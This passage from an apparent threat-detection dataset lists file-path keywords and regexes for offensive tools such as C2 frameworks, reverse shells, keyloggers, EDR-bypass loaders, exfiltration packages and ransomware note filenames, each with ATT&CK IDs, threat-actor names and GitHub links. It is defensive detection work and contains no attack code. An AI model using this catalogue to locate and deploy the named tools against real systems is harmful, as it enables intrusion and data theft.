hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","15799" "*\HijackDLL-Threads.*",".{0,1000}\\HijackDLL\-Threads\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","15800" "*\hijacker_app\src\ProxyApp.exe*",".{0,1000}\\hijacker_app\\src\\ProxyApp\.exe.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","15801" "*\hijackers\*",".{0,1000}\\hijackers\\.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","15802" "*\HijackHunter\*",".{0,1000}\\HijackHunter\\.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. 
Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","15803" "*\hiphp-cli.sh*",".{0,1000}\\hiphp\-cli\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","15804" "*\hiphp-desktop.sh*",".{0,1000}\\hiphp\-desktop\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","15805" "*\HiveDump.ps1*",".{0,1000}\s\\HiveDump\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#registry","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","15806" "*\hoaxshell\*.py*",".{0,1000}\\hoaxshell\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","15807" "*\HookChain.vcxproj*",".{0,1000}\\HookChain\.vcxproj.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","15808" "*\hookchain_finder64.c*",".{0,1000}\\hookchain_finder64\.c.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","15809" "*\hookchain_finder64.exe*",".{0,1000}\\hookchain_finder64\.exe.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","15810" "*\HookChain_msg.exe*",".{0,1000}\\HookChain_msg\.exe.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","15811" "*\HookChain_msg.sln*",".{0,1000}\\HookChain_msg\.sln.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - 
T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","15812" "*\HookDetector.csproj*",".{0,1000}\\HookDetector\.csproj.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","15813" "*\HookDetector.exe*",".{0,1000}\\HookDetector\.exe.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","15814" "*\HostEnum.ps1*",".{0,1000}\\HostEnum\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","15816" "*\HostEnum.ps1*",".{0,1000}\\HostEnum\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15817" "*\HostRecon.ps1*",".{0,1000}\\HostRecon\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","15818" "*\Hotkeyz.exe*",".{0,1000}\\Hotkeyz\.exe.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","0","N/A","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","15819" 
"*\HOW TO RECOVER YOUR FILES.TXT*",".{0,1000}\\HOW\sTO\sRECOVER\sYOUR\sFILES\.TXT.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15820" "*\HOW TO RECOVERY FILES.TXT*",".{0,1000}\\HOW\sTO\sRECOVERY\sFILES\.TXT.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15821" "*\How to Restore Your Files.html*",".{0,1000}\\How\sto\sRestore\sYour\sFiles\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15822" "*\How To Restore Your Files.txt*",".{0,1000}\\How\sTo\sRestore\sYour\sFiles\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15823" "*\HOW_RETURN_YOUR_DATA.TXT*",".{0,1000}\\HOW_RETURN_YOUR_DATA\.TXT.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15824" 
"*\how_to_decrypt.hta*",".{0,1000}\\how_to_decrypt\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15825" "*\HOW_TO_DECRYPT.txt*",".{0,1000}\\HOW_TO_DECRYPT\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15826" "*\HOW_TO_RECOVER_DATA.html*",".{0,1000}\\HOW_TO_RECOVER_DATA\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15827" "*\HOW_TO_RECOVER_FILES.txt*",".{0,1000}\\HOW_TO_RECOVER_FILES\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15828" "*\HOW_TO_RECOVER_FILES_no_personal_id.txt*",".{0,1000}\\HOW_TO_RECOVER_FILES_no_personal_id\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15829" 
"*\HOW_TO_RECOVER_FILES_no_personal_id2.txt*",".{0,1000}\\HOW_TO_RECOVER_FILES_no_personal_id2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15830" "*\HOW_TO_RECOVERY_FILES.txt*",".{0,1000}\\HOW_TO_RECOVERY_FILES\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15831" "*\How_To_Restore_Your_Files.txt*",".{0,1000}\\How_To_Restore_Your_Files\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15832" "*\hta_gen.py*",".{0,1000}\\hta_gen\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","15833" "*\HTMLSmuggler\*",".{0,1000}\\HTMLSmuggler\\.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/D00Movenok/HTMLSmuggler","1","0","N/A","N/A","10","2","162","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z","15834" "*\htran.exe*",".{0,1000}\\htran\.exe.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","N/A","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","15835" "*\Htran-master.zip*",".{0,1000}\\Htran\-master\.zip.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. 
It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","N/A","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","15836" "*\http_exfiltration.py*",".{0,1000}\\http_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","15837" "*\http_SCNotification.exe",".{0,1000}\\http_SCNotification\.exe","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","15838" "*\HTTP-Clear-Text-Password-*.txt*",".{0,1000}\\HTTP\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","15839" "*\HTTP-Client.ps1*",".{0,1000}\\HTTP\-Client\.ps1.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","15840" "*\HTTP-NTLMv1-Client-*.txt*",".{0,1000}\\HTTP\-NTLMv1\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","15841" "*\HTTP-NTLMv2-Client-*.txt*",".{0,1000}\\HTTP\-NTLMv2\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","15842" "*\httprelayserver.py*",".{0,1000}\\httprelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","15843" "*\http-request-smuggler\*",".{0,1000}\\http\-request\-smuggler\\.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","15844" "*\https_windows_implant.rs*",".{0,1000}\\https_windows_implant\.rs.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","15845" "*\HTTP-Server.py*",".{0,1000}\\HTTP\-Server\.py.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","15846" "*\huan.exe 
*",".{0,1000}\\huan\.exe\s.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tool","https://github.com/frkngksl/Huan","1","0","N/A","N/A","N/A","6","540","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z","15847" "*\hvnc.exe*",".{0,1000}\\hvnc\.exe.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","15848" "*\HVNC.sln*",".{0,1000}\\HVNC\.sln.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","15849" "*\HVNC.vcxproj*",".{0,1000}\\HVNC\.vcxproj.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","15850" "*\HVNC-main.zip*",".{0,1000}\\HVNC\-main\.zip.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - 
TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","15851" "*\HVNC-Server.exe*",".{0,1000}\\HVNC\-Server\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","15852" "*\HWSyscalls.cpp*",".{0,1000}\\HWSyscalls\.cpp.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","15853" "*\HWSyscalls-Example.*",".{0,1000}\\HWSyscalls\-Example\..{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","15854" "*\hXOR.exe*",".{0,1000}\\hXOR\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","15855" "*\hXOR-Packer v0.1\*",".{0,1000}\\hXOR\-Packer\sv0\.1\\.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","15856" "*\hXOR-Packer\*",".{0,1000}\\hXOR\-Packer\\.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","15857" "*\hyperion.exe*",".{0,1000}\\hyperion\.exe.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15858" "*\Hypnos.exe*",".{0,1000}\\Hypnos\.exe.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","15859" "*\Hypnos.sln*",".{0,1000}\\Hypnos\.sln.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","N/A","10","1","49","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z","15860" "*\Hypnos.vcxproj*",".{0,1000}\\Hypnos\.vcxproj.{0,1000}","offensive_tool_keyword","Hypnos","indirect 
